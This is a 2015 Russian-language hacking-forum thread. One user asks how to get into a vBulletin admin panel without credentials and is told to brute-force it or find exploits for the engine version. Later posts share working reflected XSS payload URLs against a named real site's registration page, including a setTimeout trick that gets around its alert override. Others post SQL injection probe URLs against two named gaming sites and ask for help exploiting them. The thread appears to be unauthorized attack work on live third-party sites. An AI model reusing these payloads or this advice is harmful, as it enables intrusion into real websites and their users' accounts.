ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.07.2015, 01:40
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
|
|
|
13.07.2015, 04:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
7728
Репутация:
5
|
|
Сообщение от SaNDER
SaNDER said:
↑
Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? . А ты думал достаточно просто найти админку?)
Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.
|
|
|
|
13.07.2015, 14:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Подскажи пжл как такой скрипт составить.
|
|
|
|
13.07.2015, 14:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
Сообщение от 3ran
3ran said:
↑
А ты думал достаточно просто найти админку?)
Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд. vBulletin 3.8.6 . Сплоиты не могу найти и юзать я их тоже не умею .
|
|
|
|
13.07.2015, 18:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
|
|
|
|
13.07.2015, 18:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
|
|
|
|
13.07.2015, 23:54
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
|
|
|
|
14.07.2015, 13:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Сообщение от yarbabin
yarbabin said:
↑
я пока сам не понял в чем дело, однако prompt() срабатывает:
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20onerror=alert%28/1/%29%3E
|
|
|
|
14.07.2015, 15:22
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Код:
Code:
http://navi-gaming.com/en/achievements?id[]=71
Код:
Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
|
|
|
|
15.07.2015, 00:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Сообщение от frank
frank said:
↑
И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20onerror=alert%28/1/%29%3E
Вот так работает:
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3EsetTimeout%28%22alert%28123%29%22,1000%29;%3C/script%3E%3Ca%20x=%22
Связано это с тем, что происходит назначение window.alert=function(text){$.DF.Popup.open из файла http://100ads.net/scripts/df.js и в это же самое время мы вызываем функцию алерт. Если добавить таймаут все ок
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
